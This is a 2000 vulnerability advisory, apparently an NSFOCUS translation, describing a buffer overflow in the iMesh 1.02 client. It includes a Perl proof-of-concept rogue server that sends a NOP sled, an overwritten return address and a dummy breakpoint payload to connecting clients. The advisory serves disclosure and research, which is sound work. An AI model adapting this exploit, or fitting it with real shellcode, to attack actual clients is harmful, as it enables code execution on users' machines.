iMesh 1.02 Remote Overflow Vulnerability

Published: 2000-06-23
Updated: 2000-06-23

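Affected systems:

iMesh 1.02

Description:

A buffer overflow vulnerability exists in iMesh 1.02 that may allow an
attacker to execute arbitrary code. When the iMesh client connects to a
server, the server can exploit this vulnerability to attack the client and
may be able to execute arbitrary commands on the host where the iMesh client
is running.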



<* Source: Chopsui-cide[MmM] 2000
          http://midgets.box.sk/
*>





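Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!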


#!/usr/bin/perl
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
# http://midgets.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#

use IO::Socket;

$localhost = "localhost";
$port = "5000";

# Dummy payload
$payload = "";
$c = 0;
while($c < 0x1aa) {
    $payload .= "\x90";
    $c += 1;
};
$payload .= "\xcc"; # raise exception 03h

$es = "";
$c = 0;
while($c < 0x2723) {
    $es .= "\x90";
    $c += 1;
};
$es .= "\x43\x04\x43\x00";
$c = 0;
while($c < 12) {
    $es .= "\x90";
    $c += 1;
};
$es .= $payload;

#print "$es";

# Listen as the server side and wait for the iMesh client to connect
$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket.\n";
print "waiting for connection on port $port...";
$accsock = $lsock->accept();
print "connected.\n";
print $accsock "$es";
sleep(5);
close($accsock);
close($lsock);



Recommendation:

None available at this time.

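This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.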